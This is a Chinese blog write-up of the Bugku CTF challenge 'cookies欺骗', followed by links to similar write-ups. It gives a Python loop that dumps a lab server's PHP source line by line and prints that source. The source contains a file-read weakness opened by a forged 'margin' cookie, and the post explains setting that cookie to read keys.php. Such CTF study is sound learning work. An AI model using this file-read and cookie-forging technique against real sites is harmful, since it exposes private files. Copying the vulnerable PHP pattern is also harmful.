Bugku——cookies欺骗

最新推荐文章于 2021-10-27 14:15:00 发布
最新推荐文章于 2021-10-27 14:15:00 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42936656/article/details/82812081
版权

URL的中的base64解码为keys.txt。 猜测文件名都是以base64的方式使用的。
key.txt的内容有些不明所以,干脆去索引页面(index.php)看看源码。
index.php用base64加密后替换key.txt的base64,页面存在却没有内容,查看源码发现只有<?php ,说明源码需要加参数遍历。
发现给参数line一个个传入值才有源码,写Python脚本遍历出源码

import requests
a = 40
for i in range(a):
    url = 'http://120.24.86.145:8002/web11/index.php?line=%d&filename=aW5kZXgucGhw=' % i
    r = requests.get(url)
    print r.text

源码如下:

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='')
header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin')
{
  $file_list[2]='keys.php';
}
if(in_array($file, $file_list))
{
$fa = file($file);
echo $fa[$line];
}

根据源码的意思,我们将keys.php用base64加密后替换原base64,再用burpsuite使cookie传入值margin=margin 即可得到flag。

Dig_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugKucookies 欺骗
wssmiss的博客
03-25 1511
题目链接 http://123.206.87.240:8002/web11/ 查看源码后没有可用信息 观察url发现参数filename的值加密了 解密后filename=keys.txt 尝试用修改参数filename的值为index.php(注意此处要用base64加密为aW5kZXgucGhw) 发现参数line没有给值,随意赋值如3,出现 写脚本抓原代码,先试一下有多少行,100,50...
Cookies 欺骗漏洞的防范方法(vbs+js 实现)
10-29
【标题】: "防范Cookies欺骗漏洞的策略与实践(vbs+js实现)" 【描述】: 本文探讨了如何防范ASP开发中的Cookies欺骗漏洞,通过VBS(Visual Basic Script)和JS(JavaScript)代码示例,阐述了从依赖不安全的Cookies...
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
Bugku——cookie欺骗
csu_vc的博客
10-28 8376
看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- # @Date : 2017-10-28 09:36:41 # @Author : csu_vc # @Link : http://blog.c
cookie欺骗bugku)
weixin_46396711的博客
04-28 1240
解题思路: 打开链接,发现是一串无意义的字符串 观察url,发现filename的值为base64编码格式,解码为keys.txt,line应该表示行,基于此,可通过改变line的值并将filename值改为index.php(记得转为base64格式),查看该文件的代码。 当line=1时 当line=2时 可通过python脚本将该文件内容打印出来 import requests a=25 #表示index.php文件的代码行数 for i in range(a): url="http:/
cookie 修改欺骗必备工具
12-29
在网络安全领域,Cookie修改欺骗是一种常见的技术,常用于测试网站的安全性、理解用户跟踪机制以及进行恶意攻击。本文将深入探讨Cookie的相关知识,包括其原理、作用,以及如何使用修改工具进行欺骗操作。 Cookie是...
汉化版IECookiesView——cookies查看器-l绿色版.rar
04-11
一个可以帮你搜寻并显示出你计算机中所有的Cookies档案的数据,包括是哪一个网站写入Cookies的,内容有什么,写入的时间日期及此Cookies的有效期限..等等资料。你是否常常怀疑一些网站写入Cookies内容到你的计算机中...
bugku cookie欺骗(python解)
Superpig的博客
11-11 507
思路 1、打开页面后,观察url中有两个参数,其中filename的参数是一个base64编码,解码得keys.txt 2、为了得到源码,传入index.php的base64,得到&amp;amp;amp;lt;?php,修改line的值为1,得error_reporting(0);,可以判断是按行读取,因此,写个脚本得到整个代码 运行结果如下: 分析源码得,当cookie 的margin属性的值为margin而且f...
bugku——cookie欺骗
吃肉唐僧的博客
09-02 339
打开题目地址,一串不懂的重复的字符串 一眼就看出这个filename后面的是base64加密的字符,解密出来时keys.txt 后来访问keys.txt,发现还是这些重复的字符 后来试着将index.php也base64加密试下,而且变动line会有显示文件源码行数内容 写个脚本把他全部拿下来 前30行,代码如下 <?php error_reporting(0);...
cookie欺骗bugku
hhh
09-06 2436
利用cookie值进行攻击; 完全没有一点经验,看到这个提示,我唯一能想到的就是用burpsuite抓包后修改一下cookie值,也许会有些什么东西;可是抓包后完全无从下手…… 然后有没有发现这道题的url跟其他的有些不一样呢?后面有一串很奇怪的参数,这熟悉的“=”,应该是base64编码,拿去解码一下:原来是&amp;fillename=key.txt; 另外url里还有一个参数:line...
BugKu -- cookies欺骗
热门推荐
小水池
08-11 1万+
cookies欺骗         100 http://120.24.86.145:8002/web11/ 答案格式:KEY{xxxxxxxx}  解题思路: 打开链接是一串没有意义的字符串,查看源码没有发现什么 观察url ,发现 a2V5cy50eHQ= 是一个base64编码,解码后是keys.txt http://120.24.86.145:8002/web11/i...
bugkucookies欺骗 writeup
perye
02-27 2977
看到url上的参数有base64,解码发现是keys.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- import requests s=requests.Session() url='http://120.24.86.145:8002/web11/in...
bugku--cookie欺骗
YenKoc的博客
11-30 290
打开题目一看,是一串的东西,再看了一下filename发现不对劲了,明显是base64编码,拿去解码一下, 发现是这个,说明是filename,是需要解析的哪个文件名,把index.php编码一下,试试, 说明line需要去操作的,才可以把index.php给弄出来.直接上脚本 顺着代码意思,加入cookie就完事了。 ...
bugku-web-cookie欺骗
a3uRa的一个窝
08-14 878
url上有base64,解密得到filename=key.txt index.php用base64加密 同样方法,把加密后的字符串,放到filename的参数中,回车 查看源代码,发现 import requests s=requests.session() url='http://120.24.86.145:8002/web11/index.php' for i in range(0...
bugku cookies
hintll的博客
06-17 1626
bugku cookies 又是一道花费比奖励还高的bugku web的题: 开环境后是一堆乱码 一开始猜测乱码是不是提示 但是后来想了一下,这是web的题又不是misc的题,所以应该不是编码 习惯性的看一下源码: 源码里也是什么都没有 f12看一下网络: 无意间看到了一个特殊的参数: http://114.67.246.176:12368/index.php?line=&filename=a2V5cy50eHQ= 后来仔细看,才发现这是URL a2V5cy50eHQ=像是一个base64的
bugku-cookies
m0_62094846的博客
10-27 1005
一串代码,试过各种解码方式,都没用 这串代码有点像base64,解码得到keys.txt,但代替代码后页面没有信息 那么这串代码可能是某种固定格式,尝试使用其他文件名代替,flag.php,index.php的base64代码依次尝试 但都没获得有用的信息 这时注意到有个line,查找一下 line表示当前文件的行数,后面什么数字都没有,显然无法出现文件 ...
BugKu_cookies
Kobalos的博客
08-10 403
访问目标地址,发现了一串不知道在表达什么的字符串 看到url最后是一个base64加密了的字符串“a2V5cy50eHQ=”,尝试解码 尝试用 filename访问index.php(原url使用base64,这也将index.php进行编码),line参数应该是行数,试一下 line=2 那么尝试把line改成3看看会发生什么呢 到这里可以猜测,每改一次行数就会显示一行源码! 我们尝试把line改成20的时候,发现是个空白页,不断减少范围,发现共有18行源代码! 构造脚本! 代码如下: im.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值